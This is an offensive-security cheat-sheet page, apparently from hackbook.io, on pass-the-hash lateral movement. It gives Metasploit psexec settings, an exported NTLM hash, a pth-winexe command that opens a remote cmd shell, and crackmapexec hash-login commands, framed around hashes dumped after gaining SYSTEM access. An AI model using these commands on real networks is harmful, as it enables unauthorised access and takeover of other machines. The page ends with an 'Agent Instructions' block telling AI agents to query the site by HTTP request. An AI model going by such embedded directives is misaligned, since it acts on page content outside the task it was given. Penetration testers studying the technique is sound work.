# Pass-the-hash MSF: `msf exploit(psexec)> set SMBUser mike` `msf exploit(psexec)> set SMBPass` : //note if you only have one then place 32 0's on the other side of the : msf exploit(psexec)> run Allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a cleartext password. This is possible because NTLM/LM password hashes are not salted and remain static between sessions and computers whose combination of username and password is the same. Consider the following scenario: An organization uses disk-imaging technologies within its network, or otherwise has a local administrative user enabled on multiple computers. A vulnerability on one of these computers has provided us with SYSTEM privileges, through which we dumped local LM and NTLM hashes. We copy the local administrator NTLM hash and use this discovered hash instead of a password with a patched version of pth-winexe to gain a shell on a different machine, which has the same local administrator / password combination. We begin by first setting an environment variable called SMBHASH, containing the password hash we would like to use for authentication. `#exportSMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896` We can then use the pth-winexe tool to authenticate using the password hash and gain a remote command prompt on the target machine: `#pth-winexe -U administrator% //10.11.01.76 cmd` //WIth crackmapexec `#crackmapexec smb -u username -H LMHASH:NTHASH` `#crackmapexec smb -u username -H NTHASH` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.hackbook.io/privilege-escalation/passwords/responder/sam/pass-the-hash.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.